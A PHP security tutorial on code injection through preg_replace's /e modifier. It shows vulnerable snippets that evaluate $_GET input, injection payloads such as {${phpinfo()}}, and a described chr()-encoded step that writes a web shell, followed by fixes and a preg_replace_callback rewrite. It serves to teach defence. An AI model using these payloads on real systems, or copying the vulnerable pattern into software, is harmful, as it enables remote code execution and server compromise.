preg_replace function prototype:
mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
Special note:
The /e modifier causes preg_replace() to treat the replacement argument as PHP code (after backreference substitution). Make sure the replacement forms a valid PHP code string, otherwise PHP reports a parse error on the line containing the preg_replace() call.
Example:
The code is as follows:
<?php
preg_replace("/(<\/?)(\w+)([^>]*>)/e",
    "'\\1'.strtoupper('\\2').'\\3'",
    $html_body);
?>
This will make all HTML tags in the input string uppercase.
Security threat analysis:
Usually some of these parameters come from the client, and the client may supply malicious content, for example:
The code is as follows:
<?php
echo preg_replace("/test/e", $_GET["h"], "just test");
?>
If we submit ?h=phpinfo(), phpinfo() will be executed (with the /e modifier, preg_replace treats the replacement parameter as PHP code and executes it).
What happens if we submit the following code?
The chr() sequence decodes to: fputs(fopen(data/a.php,w), );
The result is that a one-line web shell, a.php, is written to the /data/ directory.
A trickier example:
The code is as follows:
<?php
function test($str)
{
}
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", 'test("\1")', $_GET["h"]);
?>
If we submit ?h=[php]phpinfo()[/php], will phpinfo() be executed?
Definitely not. After the regular expression matches, the replacement becomes 'test("phpinfo()")', and phpinfo() is only a string argument at this point.
Is there any way to make it execute?
Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?
In PHP, a variable inside a double-quoted string is replaced by the result of evaluating it; variables inside single-quoted strings are not processed.
Note: a plain function call inside double quotes is not executed or substituted.
So we construct a special variable expression with {${}}, giving 'test("{${phpinfo()}}")', so that the function is executed (${phpinfo()} is interpreted as a variable-variable, which evaluates phpinfo()).
You can try the following test first:
The code is as follows:
<?php
echo "{${phpinfo()}}";
?>
phpinfo() will be executed.
How to prevent this vulnerability?
Change 'test("\1")' to "test('\\1')" so that '{${phpinfo()}}' is treated as an ordinary string (variables in single quotes are not interpolated).
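An added example (not from the original article) showing how both snippets above can be rewritten without the /e modifier, using preg_replace_callback, which takes a real PHP callable instead of a string that is compiled and run; the /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this also keeps the code working on current PHP. The body of test() is an assumption, since the article leaves it empty.

```php
<?php
// Added example: the article's two /e uses, rewritten with preg_replace_callback.
// The replacement is a PHP callable, so user input only ever reaches it as a
// string argument and is never compiled as code.

// 1. Uppercase all HTML tag names (the article's first example).
function uppercase_tags(string $html): string
{
    return preg_replace_callback(
        '/(<\/?)(\w+)([^>]*>)/',
        function (array $m): string {
            return $m[1] . strtoupper($m[2]) . $m[3];
        },
        $html
    );
}

// 2. Handle [php]...[/php] blocks (the article's second example).
// test() body assumed here: escape the captured text and bracket it.
function test(string $str): string
{
    return '[' . htmlspecialchars($str, ENT_QUOTES, 'UTF-8') . ']';
}

function replace_php_tags(string $input): string
{
    return preg_replace_callback(
        '/\s*\[php\](.+?)\[\/php\]\s*/is',
        function (array $m): string {
            return test($m[1]);   // $m[1] is plain data, not code
        },
        $input
    );
}

// Constructed inputs, including the {${...}} payload the article discusses.
$html = '<p class="x">hi <b>there</b></p>';
echo uppercase_tags($html), "\n";

// The braces and dollar sign are echoed back as literal text;
// there is no string to interpolate and no code is evaluated.
$attack = '[php]{${phpinfo()}}[/php]';
echo replace_php_tags($attack), "\n";
```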